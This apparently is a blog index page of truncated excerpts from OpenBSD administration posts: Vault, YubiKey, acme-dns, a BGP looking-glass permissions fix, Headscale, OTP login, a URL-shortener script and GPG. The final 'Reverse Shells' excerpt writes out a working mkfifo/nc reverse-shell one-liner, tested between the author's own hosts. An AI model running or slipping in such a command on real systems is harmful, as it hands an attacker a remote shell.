how to Install and run Hashicorp Vault on OpenBSD in addition to [https://blog.stoege.net/categories/vault/](this Blog Entry), here some instructions for OpenBSD.
Requirements VM with OpenBSD 7.2 (or older …) and root/doas permission Domain, or at least a FQDN Name pointing to your VM HTTP/HTTPS allowed from Internet (for Certificate Generation) Nginx installed (pkg_add nginx) Source https://developer.hashicorp.com/vault/docs/get-started/developer-qs
Install Vault all the Steps must be run as root (or with doas)
pkg_add vault Vault Config Backup the prev.
Running YubiKey on OpenBSD buy a Key and give try …
Source https://www.yubico.com/
Install Software pkg_add yubikey-manager-3.1.2p4 pkg_add yubikey-manager-3.1.2p4 quirks-6.42 signed on 2023-01-08T01:39:04Z yubikey-manager-3.1.2p4:py3-click-7.1.2: ok yubikey-manager-3.1.2p4:py3-pyusb-1.0.2p5: ok yubikey-manager-3.1.2p4:pcsc-lite-1.9.8: ok yubikey-manager-3.1.2p4:py3-cparser-2.19p2: ok yubikey-manager-3.1.2p4:py3-cffi-1.15.1: ok yubikey-manager-3.1.2p4:py3-cryptography-38.0.0p0: ok yubikey-manager-3.1.2p4:py3-pyscard-2.0.3: ok yubikey-manager-3.1.2p4:py3-openssl-22.0.0: ok yubikey-manager-3.1.2p4:libyubikey-1.13p4: ok yubikey-manager-3.1.2p4:json-c-0.16: ok yubikey-manager-3.1.2p4:ykpers-1.20.0p2: ok yubikey-manager-3.1.2p4: ok The following new rcscripts were installed: /etc/rc.d/pcscd See rcctl(8) for details. --- +yubikey-manager-3.1.2p4 ------------------- NOTE: yubikey-manager (ykman) is only partially functional on OpenBSD. Most of the "ykman fido xxx" commands (pin-setting and others) stall.
Web A simplified DNS server with a RESTful HTTP API to provide a simple way to automate ACME DNS challenges. Sounds promising, right ? Let’s give try ;)
https://github.com/joohoi/acme-dns Setup fireup a new OpenBSD VM let’s do it in London. ip: 100.10.20.30 patch, update, add go doas su - syspatch pkg_add -Vu pkg_add go clone repo and build acme-dns cd /root git clone https://github.com/joohoi/acme-dns cd acme-dns export GOPATH=/tmp/acme-dns go build cp acme-dns /usr/local/sbin/ Create Selfsign Cert the RESTful API need’s a Cert.
I’m running a BGP Looking Glass Server on https://bgp.stoege.net, where can get some view about BGP running on the Global Internet.
Upgrade to 7.2 Did an Upgrade to the latest Version with my Script.
Upgrade was sucessful, but the BGP Service needs some Fix. Website show as “500 Internal Server Error”, and the Logs got a few messages like this:
tail -f /var/log/messages Oct 21 11:38:07 bapi slowcgi[62677]: execve /cgi-bin/bgplg: Permission denied Oct 21 11:38:07 bapi slowcgi[93993]: caught exit of unknown child 62677 Oct 21 11:38:12 bapi slowcgi[45500]: execve /cgi-bin/bgplg: Permission denied Reapply the Permission chmod 0550 /var/www/cgi-bin/bgplg chown www:daemon /var/www/cgi-bin/bgplg chmod 0555 /var/www/bin/bgpctl chmod 4555 /var/www/bin/ping* /var/www/bin/traceroute* Check Service $ curl --head "https://bgp.
OpenBSD 7.2 finally released. Yesterday, the 53th Relase of OpenBSD got publised, the [Version 7.2)(https://www.openbsd.org/72.html). I’ll upgrade my boxes as usual with the following Script. The most obvious change is the Performance improvement for the Package Mangager, but there is always so more see undeadly
Upgrade Guide As usual, follow to official Upgrade Guide. You can Upgrade with an USB Stick, ISO Image, PXE Boot or inline (from a running system).
Running Headscale Server on OpenBSD i like and widely use wireguard for my infrastructure. i’m also aware of it’s limitation and i know the tailscale project but never gave try. recently, i stumbled upon the headscale project, an opensource alternative to for the (closed) tailscale server. perfect, let’s give a try!
and, of course, i’m gooing to implement this with OpenBSD, what else ;)
Doku https://github.com/juanfont/headscale/blob/main/docs/running-headscale-openbsd.md https://zakaria.org/posts/headscale-setup.md on the Server compile and install server this is working on OpenBSD 7.
i don’t like ssh & password authentication. but sometime, specially during setup or recovery, it’s need and make sense. thought i’ll protect some boxes with otp. here a few notes and instrucations
Build login_otp git clone https://github.com/reyk/login_otp cd login_otp make obj make all doas make install Initialize OTP DB doas otp -i Generate Key for User otp -g Name: stoege Key: xxxx xxxx xxxx xxxx xxxx xxxx xx URL: otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30 Build QR Code echo "otpauth://totp/stoege?
CLI Url Shortener wrote a little URL Shortener in Python with FastAPI and a wrapper script for cli usage. needs httpie & jq packages. python backend is under development, cli wrapper for different os right here …
Usage somehost$ ./myurlshort usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe https://url.stoege.net/xXxXx CLI Wrappers OpenBSD cat << 'EOF' > myurlshort #!/usr/bin/env bash # url shortener for openbsd, v1.0, 2022-09-12, by @stoege which jq >/dev/null || ( echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; ) which https >/dev/null || ( echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; ) if [[ $# -ne 1 ]]; then echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.
GPG and how to use it Create a Key with ECC gpg --expert --full-generate-key (9) ECC and ECC (1) Curve 25519 0 = key does not expire (or whatever you prefer!) Real name: Max Muster Email address: max@muster.net Comment: - pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid Max Muster (-) <max@muster.net> sub cv25519 2022-09-04 [E] Public Key max@host $ gpg /home/max/.gnupg/pubring.kbx ---------------------------- pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid [ultimate] Max Muster (-) <max@muster.
Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Lister on Host A (192.168.1.100)
hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;)
Any Comments ? sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3